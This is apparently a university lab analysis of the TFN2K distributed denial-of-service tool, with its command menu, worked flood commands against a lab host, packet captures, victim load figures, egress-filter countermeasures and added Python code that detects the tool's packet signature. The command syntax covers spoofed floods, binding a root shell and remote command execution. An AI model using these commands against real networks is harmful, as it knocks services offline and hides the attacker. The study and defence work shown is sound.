Contents
========

  - The TFN2K attack model
  - The attack command menu of the client tfn
  - The attack examples
      ICMP flood attack
      MIX attack using TCP, UDP and ICMP
      snoop data at the victim
      Victim loading
  - Counter measures
  - References


The TFN2K attack model
======================

The client program tfn, running on the Client host, sends commands to its
server nodes, each of which runs the server program td. The communication
between the client and the server nodes is encrypted with the CAST-256
algorithm (key length from 128 to 256 bits). The command packets are sent with
random source IP addresses over TCP, UDP or ICMP; hence the communication is
one way, from the client to the server nodes. Once the server nodes receive
the commands from their client, they commence the flood attack.

TFN2K provides the following attacks:

    UDP flood,          usage: -i victim@victim2@victim3@...
    TCP/SYN flood,      usage: -i victim@... [-p destination port]
    ICMP/PING flood,    usage: -i victim@...
    ICMP/SMURF flood,   usage: -i victim@broadcast@broadcast2@...
    MIX flood (UDP/TCP/ICMP interchanged),  usage: -i victim@...
    TARGA3 flood (IP stack penetration),    usage: -i victim@...

The attack packets sent to the victim also use random source IP addresses.
Hence it is difficult to trace the origin of the attack, even when sniffing
the attack packets.

                   *----------*
                   |          |
                   | Attacker |
                   |          |
                   *----------*
                        |
                        |
                   *----------*
                   |          |
                   |  Client  |
                   |          |
                   *----------*
                        |
               (commands to nodes)
                        |
     *------------*-----*------*------------*
     |            |            |            |
     |            |            |            |
     v            v            v            v
*----------* *----------* *----------* *----------*
|          | |          | |          | |          |
|   Node   | |   Node   | |   Node   | |   Node   |
|          | |          | |          | |          |
*----------* *----------* *----------* *----------*
      \            \          /            /
       \            \        /            /
        \            \      /            /   (any number of floods or attacks)
         \            \    /            /
          \            \  /            /
           \            \/            /
            V           V            V
            *------------------------*
            |                        |
            |         Victim         |
            |                        |
            *------------------------*


The command menu of the client tfn
==================================

    [root@iegatea0 tfn2k]# ./tfn
    usage: ./tfn
    [-P protocol]       Protocol for server communication. Can be ICMP, UDP or TCP.
                        Uses a random protocol as default
    [-D n]              Send out n bogus requests for each real one to decoy targets
    [-S host/ip]        Specify your source IP. Randomly spoofed by default, you need
                        to use your real IP if you are behind spoof-filtering routers
    [-f hostlist]       Filename containing a list of hosts with TFN servers to contact
    [-h hostname]       To contact only a single host running a TFN server
    [-i target string]  Contains options/targets separated by '@', see below
    [-p port]           A TCP destination port can be specified for SYN floods
    <-c command ID>     0 - Halt all current floods on server(s) immediately
                        1 - Change IP antispoof-level (evade rfc2267 filtering)
                            usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
                        2 - Change Packet size, usage: -i
                        3 - Bind root shell to a port, usage: -i
                        4 - UDP flood, usage: -i victim@victim2@victim3@...
                        5 - TCP/SYN flood, usage: -i victim@... [-p destination port]
                        6 - ICMP/PING flood, usage: -i victim@...
                        7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...
                        8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...
                        9 - TARGA3 flood (IP stack penetration), usage: -i victim@...
                       10 - Blindly execute remote shell command, usage -i command

The communication packets between the client and the server nodes use random
source IP addresses:

    [root@iegatea0 ~]# tcpdump host ntec1
    10:25:29.858622 eth0 > 53.165.192.0.22668 > 137.189.99.81.64952: S 0:47(47) win 5093
    10:25:29.879226 eth0 > 53.165.192.0.6798 > 137.189.99.81.53721: udp 30
    10:25:29.899051 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:29.919050 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:29.939055 eth0 > 53.165.192.0.17166 > 137.189.99.81.16226: udp 30
    10:25:29.959076 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:29.979260 eth0 > 53.165.192.0.16704 > 137.189.99.81.40553: . 339790:339837(47) ack 0 win 0
    10:25:29.999074 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:30.019075 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:30.039048 eth0 > 53.165.192.0.4810 > 137.189.99.81.3467: udp 30
    10:25:30.059291 eth0 > 53.165.192.0.25373 > 137.189.99.81.58732: S 4707273:4707320(47) ack 11500271 win 32087
    10:25:30.079044 eth0 > 53.165.192.0.46691 > 137.189.99.81.3017: udp 30
    10:25:30.099208 eth0 > 53.165.192.0.50047 > 137.189.99.81.14998: . 0:47(47) ack 0 win 50064
    10:25:30.119105 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:30.139040 eth0 > 53.165.192.0.18898 > 137.189.99.81.64259: udp 30
    10:25:30.159230 eth0 > 53.165.192.0.44591 > 137.189.99.81.41979: S 9902919:9902966(47) ack 0 win 55543
    10:25:30.179037 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:30.199090 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:30.219062 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply
    10:25:30.239121 eth0 > 53.165.192.0 > 137.189.99.81: icmp: echo reply

The command messages in the communication packets between the client and the
server nodes are encrypted with CAST-256. Note that these packets carry a
signature: a 0x41 byte at the end of each packet.
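To turn that observation into a check, here is an added example (not part of the original page) that parses the three client-to-node packets captured with tcpdump -x on this page (one ICMP echo reply, one UDP, one TCP SYN), locates the transport payload, counts the trailing 0x41 bytes, and also reports the header fields in those dumps that disagree with the bytes actually on the wire (the UDP length field and the TCP data offset). The payload text and the sample bytes are copied from the page's capture; nothing else is assumed.

```python
# The three client->node packets captured with `tcpdump -x` on this page
# (ICMP echo reply, UDP, TCP SYN): hex words only, timestamp lines removed.
SAMPLE_DUMP = """
4500 0037 e8a6 0000 dd01 f73a 13d5 fd00 89bd 6351 0000 a8ef 0c21 7e9d 2b54 4473
7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41
4500 0037 76a4 0000 d911 6d2d 13d5 fd00 89bd 6351 e60a 5b50 0026 f252 2b54 4473
7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141 4141 41
4500 0043 bc99 0000 d906 2737 13d5 fd00 89bd 6351 60bd 663f 00b5 6036 00dd 7e9b
0002 5c1c 302f 0000 2b54 4473 7955 6862 5463 6471 7a4b 6a72 6543 5a38 5a41 4141
4141 41
"""

def split_packets(hexdump: str) -> list[bytes]:
    """Re-assemble raw IPv4 packets: each header's total-length field tells
    where the next packet begins, so no per-packet framing is needed."""
    raw = bytes.fromhex("".join(hexdump.split()))
    pkts, i = [], 0
    while i + 20 <= len(raw):
        total = int.from_bytes(raw[i + 2:i + 4], "big")
        pkts.append(raw[i:i + total])
        i += total
    return pkts

def analyse(pkt: bytes) -> dict:
    """Locate the transport payload, then apply the TFN2K checks."""
    ihl, proto = (pkt[0] & 0x0F) * 4, pkt[9]
    on_wire = int.from_bytes(pkt[2:4], "big") - ihl   # transport bytes actually present
    hdr, notes = pkt[ihl:], []
    name, off = str(proto), 0
    if proto == 1:                  # ICMP echo: fixed 8-byte header
        name, off = "icmp", 8
    elif proto == 17:               # UDP: 8-byte header carrying its own length field
        name, off = "udp", 8
        udp_len = int.from_bytes(hdr[4:6], "big")
        if udp_len != on_wire:
            notes.append(f"udp length field {udp_len}, but {on_wire} bytes on the wire")
    elif proto == 6:                # TCP: data offset = header length in 32-bit words
        name, off = "tcp", (hdr[12] >> 4) * 4
        if off < 20:
            notes.append(f"tcp data offset {off}, below the 20-byte minimum")
            off = 20                # parse past a minimal header anyway
    payload = hdr[off:]
    trailing = len(payload) - len(payload.rstrip(b"\x41"))
    printable = all(0x20 <= b < 0x7F for b in payload)
    return {"proto": name, "src": ".".join(map(str, pkt[12:16])), "payload": payload,
            "trailing_0x41": trailing, "notes": notes,
            # heuristic only: a text payload that ends in a run of 'A' (0x41),
            # as in each dump above; weigh it together with the header notes
            "suspect": trailing > 0 and printable}
```

All three packets carry the identical 27-byte payload, so a one-way stream of look-alike payloads from a random source to one host, over three different protocols, is the pattern to alert on.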
    [root@iegatea0 ~]# tcpdump -x host ntec1
    Kernel filter, protocol ALL, datagram packet socket
    tcpdump: listening on all devices
    10:25:53.368639 eth0 > 19.213.253.0 > 137.189.99.81: icmp: echo reply
                             4500 0037 e8a6 0000 dd01 f73a 13d5 fd00
                             89bd 6351 0000 a8ef 0c21 7e9d 2b54 4473
                             7955 6862 5463 6471 7a4b 6a72 6543 5a38
                             5a41 4141 4141 41
    10:25:53.387922 eth0 > 19.213.253.0.58890 > 137.189.99.81.23376: udp 30
                             4500 0037 76a4 0000 d911 6d2d 13d5 fd00
                             89bd 6351 e60a 5b50 0026 f252 2b54 4473
                             7955 6862 5463 6471 7a4b 6a72 6543 5a38
                             5a41 4141 4141 41
    10:25:53.407935 eth0 > 19.213.253.0 > 137.189.99.81: icmp: echo reply
                             4500 0037 90a4 0000 ca01 623d 13d5 fd00
                             89bd 6351 0000 2848 0b66 0000 2b54 4473
                             7955 6862 5463 6471 7a4b 6a72 6543 5a38
                             5a41 4141 4141 41
    10:25:53.428187 eth0 > 19.213.253.0.24765 > 137.189.99.81.26175: S 11886646:11886693(47) win 23580
                             4500 0043 bc99 0000 d906 2737 13d5 fd00
                             89bd 6351 60bd 663f 00b5 6036 00dd 7e9b
                             0002 5c1c 302f 0000 2b54 4473 7955 6862
                             5463 6471 7a4b 6a72 6543 5a38 5a41 4141
                             4141 41


The attack examples
===================

ICMP flood attack
=================

    [root@iegatea0 tfn2k]# ./tfn -h ntec1 -c 6 -i 137.189.96.18@
    Protocol     : random
    Source IP    : random
    Client input : single host
    Target(s)    : 137.189.96.18@
    Command      : commence icmp echo flood

The server node (ntec1 in this example) generates an enormous ICMP flood
against the victim, with random faked source IP addresses. tcpdump does not
show all of these packets, because some are dropped at the network interface,
but the switch records the full traffic:

    http://home.ie.cuhk.edu.hk/~shlam/dos/ntec1.gif

    [root@ntec1 tfn2k]# tcpdump host iest18
    Kernel filter, protocol ALL, datagram packet socket
    tcpdump: listening on all devices
    10:09:51.357753 eth0 > 30.12.188.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.358864 eth0 > 115.158.168.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.358949 eth0 > 42.57.217.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.359031 eth0 > 63.90.55.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.359113 eth0 > 83.28.81.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.359195 eth0 > 232.168.136.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360206 eth0 > 58.77.151.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360297 eth0 > 132.1.61.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360380 eth0 > 182.190.60.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360462 eth0 > 48.15.118.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360544 eth0 > 204.59.230.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360625 eth0 > 239.123.23.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360707 eth0 > 109.51.39.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360788 eth0 > 23.183.134.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360869 eth0 > 43.158.42.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.360951 eth0 > 187.232.84.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.361032 eth0 > 218.98.7.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.361121 eth0 > 217.7.176.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.361204 eth0 > 102.143.242.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.361286 eth0 > 115.58.37.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:09:51.361368 eth0 > 12.11.168.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]


MIX attack using TCP, UDP and ICMP
==================================

    [root@iegatea0 tfn2k]# ./tfn -h ntec1 -c 8 -i 137.189.96.18@
    Protocol     : random
    Source IP    : random
    Client input : single host
    Target(s)    : 137.189.96.18@
    Command      : commence mix flood

    [root@ntec1 tfn2k]# tcpdump host iest18
    10:48:01.793914 eth0 < arp reply iest18.ie.cuhk.edu.hk is-at 8:0:20:72:a3:67 (0:d0:9:1c:53:1b)
    10:48:01.860214 eth0 > 6.218.126.0.57825 > iest18.ie.cuhk.edu.hk.7711: udp 1
    10:48:01.860959 eth0 > 135.34.187.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:48:01.861308 eth0 > 67.39.22.0.38313 > iest18.ie.cuhk.edu.hk.4477: S 15307942:15307962(20) win 54614 urg 1905
    10:48:01.861446 eth0 > 105.39.155.0.57824 > iest18.ie.cuhk.edu.hk.7712: udp 1
    10:48:01.861529 eth0 > 185.107.87.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:48:01.861872 eth0 > 167.206.213.0.61293 > iest18.ie.cuhk.edu.hk.49104: S 2119505:2119525(20) win 21335 urg 55981
    10:48:01.862010 eth0 > 47.7.105.0.57823 > iest18.ie.cuhk.edu.hk.7713: udp 1
    10:48:01.862091 eth0 > 152.193.101.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:48:01.862434 eth0 > 131.2.239.0.22771 > iest18.ie.cuhk.edu.hk.64830: S 7184719:7184739(20) win 18764 urg 53747
    10:48:01.862572 eth0 > 37.213.104.0.57822 > iest18.ie.cuhk.edu.hk.7714: udp 1
    10:48:01.862653 eth0 > 246.19.128.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:48:01.862996 eth0 > 244.167.176.0.11037 > iest18.ie.cuhk.edu.hk.65445: S 4719927:4719947(20) win 51371 urg 42965
    10:48:01.863133 eth0 > 117.58.21.0.57821 > iest18.ie.cuhk.edu.hk.7715: udp 1
    10:48:01.863214 eth0 > 77.244.115.0 > iest18.ie.cuhk.edu.hk: icmp: echo request [ttl 0]
    10:48:01.863556 eth0 > 122.141.112.0.15097 > iest18.ie.cuhk.edu.hk.24997: S 61206:61226(20) win 469


snoop packet information at iest18
==================================

    iest18:>
    114   0.29517    68.235.166.0 -> iest18    length: 106  ICMP Echo request
    115   0.00017   145.228.220.0 -> iest18    length: 60   TCP D=11884 S=48698 Syn Seq=15133544 Len=20 Win=23990
    116   0.00015      8.100.11.0 -> iest18    length: 60   UDP D=2 S=65534 LEN=9
    117   0.00037       0.96.70.0 -> iest18    length: 106  ICMP Echo request
    118   0.00016   157.245.243.0 -> iest18    length: 60   TCP D=29943 S=26867 Syn Seq=16514205 Len=20 Win=31118
    119   0.00015     35.119.45.0 -> iest18    length: 60   UDP D=3 S=65533 LEN=9
    120   0.00036     17.39.208.0 -> iest18    length: 106  ICMP Echo request
    121   0.00016   202.163.187.0 -> iest18    length: 60   TCP D=31941 S=13797 Syn Seq=4735357 Len=20 Win=26478
    122   0.00016    228.207.50.0 -> iest18    length: 60   UDP D=4 S=65532 LEN=9
    123   0.00036      8.155.94.0 -> iest18    length: 106  ICMP Echo request
    124   0.00016     62.228.80.0 -> iest18    length: 60   TCP D=59474 S=62373 Syn Seq=914596 Len=20 Win=46767
    125   0.00016     33.162.35.0 -> iest18    length: 60   UDP D=5 S=65531 LEN=9
    126   0.00037    54.215.153.0 -> iest18    length: 106  ICMP Echo request
    127   0.00017    124.194.56.0 -> iest18    length: 60   TCP D=43905 S=43300 Syn Seq=2801488 Len=20 Win=7339
    128   0.00017   243.139.130.0 -> iest18    length: 60   UDP D=6 S=65530 LEN=9
    129   0.00037     24.84.140.0 -> iest18    length: 106  ICMP Echo request
    130   0.00017   101.149.180.0 -> iest18    length: 60   TCP D=52007 S=9808 Syn Seq=8685619 Len=20 Win=62874

    116   0.00015      8.100.11.0 -> iest18    UDP D=2 S=65534 LEN=9

               0: 0800 2072 a367 00d0 091c 531b 0800 4500    .. r.g....S...E.
              16: 001d 7aa4 0000 e411 5ef8 0864 0b00 89bd    ..z.....^ø.d....
              32: 6012 fffe 0002 0009 fff5 0000 0000 0000    `........õ......
              48: 0000 0000 0000 0000 0000 0000              ............

    117   0.00037       0.96.70.0 -> iest18    ICMP Echo request

               0: 0800 2072 a367 00d0 091c 531b 0800 4500    .. r.g....S...E.
              16: 005c 05d5 0000 0001 849d 0060 4600 89bd    .\.........`F...
              32: 6012 0800 f7ff 0000 0000 0000 0000 0000    `...÷...........
              48: 0000 0000 0000 0000 0000 0000 0000 0000    ................
              64: 0000 0000 0000 0000 0000 0000 0000 0000    ................
              80: 0000 0000 0000 0000 0000 0000 0000 0000    ................
              96: 0000 0000 0000 0000 0000                   ..........

    118   0.00016   157.245.243.0 -> iest18    TCP D=29943 S=26867 Syn Seq=16514205 Len=20 Win=31118

               0: 0800 2072 a367 00d0 091c 531b 0800 4500    .. r.g....S...E.
              16: 0028 9601 0000 cf06 db08 9df5 f300 89bd    .(.........õó...
              32: 6012 68f3 74f7 00fb fc9d 2265 0000 0022    `.hót÷...."e..."
              48: 798e 769c e4fa 0000 0000 0000              y.v.........

    119   0.00015     35.119.45.0 -> iest18    UDP D=3 S=65533 LEN=9

               0: 0800 2072 a367 00d0 091c 531b 0800 4500    .. r.g....S...E.
              16: 001d bcf6 0000 e511 de92 2377 2d00 89bd    ...ö......#w-...
              32: 6012 fffd 0003 0009 fff5 0000 0000 0000    `........õ......
              48: 0000 0000 0000 0000 0000 0000              ............


Victim loading
==============

Before the attack the CPU is over 90% idle:

    last pid:   469;  load averages:  1.41,  0.86,  0.55                10:51:10
    44 processes:  42 sleeping, 1 running, 1 on cpu
    CPU states: 97.4% idle,  0.2% user,  2.0% kernel,  0.4% iowait,  0.0% swap
    Memory: 64M real, 2684K free, 328M swap free

During the attack the kernel share of CPU time shoots up to 85%:

    last pid:   469;  load averages:  1.67,  0.82,  0.53                10:52:16
    44 processes:  42 sleeping, 1 running, 1 on cpu
    CPU states: 14.4% idle,  0.2% user, 85.1% kernel,  0.4% iowait,  0.0% swap
    Memory: 64M real, 3316K free, 328M swap free


Counter measures
================

There is no known way to defend against TFN2K. Many experts only suggest
preventing your own network resources from being used as clients or server
nodes of the attack.

1) Egress filtering to stop spoofed IP packets from leaving your network

   I have done this by applying the following rules at the ERG router.

   For the IE network:

       Extended IP access list 150
           permit ip 137.189.96.0 0.0.3.255 any
           deny ip any any log

   For the ERG network:

       Extended IP access list 151
           permit ip 137.189.94.0 0.0.0.255 any
           deny ip any any log

2) Disable IP directed broadcast on all systems

   The ERG router has the following applied on each network interface:

       no ip directed-broadcast

3) Secure your hosts to keep intruders out.


References
==========

http://packetstorm.securify.com/distributed/TFN2k_Analysis-1.3.txt
http://www.sans.org/dosstep/index.htm
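The egress rules in the counter measures section are easiest to reason about by executing them. This added example (not from the original page) implements Cisco first-match wildcard-mask semantics for the two access lists given there and runs them against spoofed source addresses taken from the ICMP-flood and MIX captures on this page, plus the real addresses of iest18 (137.189.96.18) and ntec1 (137.189.99.81). Every spoofed source falls through to the deny line, and its log keyword means the same filter also reveals a node inside the network that has started flooding.

```python
from ipaddress import IPv4Address

# The two egress access lists from the counter measures section, in Cisco IOS
# wildcard-mask notation (a 1 bit in the mask means "don't care").
ACL_150_IE = """permit ip 137.189.96.0 0.0.3.255 any
deny ip any any log"""
ACL_151_ERG = """permit ip 137.189.94.0 0.0.0.255 any
deny ip any any log"""

def wildcard_match(addr: str, network: str, wildcard: str) -> bool:
    """Compare only the bits the wildcard mask marks as significant."""
    care = ~int(IPv4Address(wildcard)) & 0xFFFFFFFF
    return (int(IPv4Address(addr)) & care) == (int(IPv4Address(network)) & care)

def parse_acl(text: str) -> list[tuple[str, str, str, bool]]:
    """Return (action, source, wildcard, log) per 'permit|deny ip <src> [wc] any [log]' line."""
    rules = []
    for line in text.strip().splitlines():
        f = line.split()
        if f[2] == "any":
            src, wc, rest = "0.0.0.0", "255.255.255.255", f[3:]
        else:
            src, wc, rest = f[2], f[3], f[4:]
        rules.append((f[0], src, wc, "log" in rest))
    return rules

def egress_verdict(acl: str, src: str) -> tuple[str, bool]:
    """First matching rule wins, as on IOS; an unmatched packet hits the implicit deny."""
    for action, net, wc, log in parse_acl(acl):
        if wildcard_match(src, net, wc):
            return action, log
    return "deny", False

# Source addresses taken from this page: four spoofed ones from the ICMP-flood
# and MIX captures, then the victim iest18 and the node ntec1 (both IE network).
CAPTURED = ["30.12.188.0", "115.158.168.0", "6.218.126.0", "67.39.22.0",
            "137.189.96.18", "137.189.99.81"]

def filter_report(acl: str, sources: list[str]) -> dict[str, str]:
    """Map each source to what the ACL does with it: permit, deny or deny+log."""
    out = {}
    for s in sources:
        action, log = egress_verdict(acl, s)
        out[s] = action + ("+log" if log else "")
    return out
```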